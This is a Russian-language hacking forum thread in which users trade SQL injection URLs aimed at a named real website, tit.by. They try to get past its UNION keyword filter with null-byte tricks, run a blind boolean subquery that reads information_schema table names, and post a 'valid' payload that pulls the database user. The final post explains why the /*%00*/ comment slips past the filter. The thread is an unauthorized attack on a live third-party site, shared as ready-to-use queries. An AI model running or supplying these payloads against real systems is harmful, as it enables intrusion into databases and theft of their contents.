Фильтрация UNION на крупном сайте
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Фильтрация UNION на крупном сайте - 2011-12-07 16:19:03.210000
|
|
|
GaMeSTeR_04reg
Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
|
Вообщем не удалось обойти фильтрацию UNION по этому вот ссылка на растерзание: http://www.tit.by/stat.php?id=18101+aNd+1=0+UN%00ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+ У кого получиться просьба кинуть хотябы в личку.
|
|
|
RE: Фильтрация UNION на крупном сайте - 2011-12-07 21:58:00.416666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Подзапросами не судьба?
|
|
|
RE: Фильтрация UNION на крупном сайте - 2011-12-08 09:44:00.493333
|
|
|
GaMeSTeR_04reg
Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
|
quote:
ORIGINAL: r1dex Подзапросами не судьба? Продемонстрируй
|
|
|
RE: Фильтрация UNION на крупном сайте - 2011-12-08 20:24:51.343333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.tit.by/stat.php?id=18102+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+28,1),1,1)))>1–+
|
|
|
RE: Фильтрация UNION на крупном сайте - 2012-02-03 08:00:52.223333
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
Сто лет уже не флудил на форуме) Кину свои пять копеек… фильтрация обходится не так, вот валидный пример http://www.tit.by/stat.php?id=18101+/*%00*/+aNd+1=0+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+–+
|
|
|
RE: Фильтрация UNION на крупном сайте - 2012-02-06 17:40:48.476666
|
|
|
Tomagawk
Сообщений: 3
Оценки: 0
Присоединился: 2010-11-16 14:17:34.633333
|
Captain TOma50, /*%00*/ - это что за конструкция такая? И как она работает?
|
|
|
RE: Фильтрация UNION на крупном сайте - 2012-02-07 00:02:35.566666
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
Готовый запрос тебе дали, валидный, можно погуглить и разобраться как это работает. Можно и просто логически подумать, %00 символ переноса строки, функция которая осуществляет фильтрацию его не переваривает и не добирается до иньекта, запрос попадает в БД, чтобы запрос не развалился %00 запиливаем как комментарий - /*%00*/, то есть sql его просто игнорирует.
|
|
|
|
|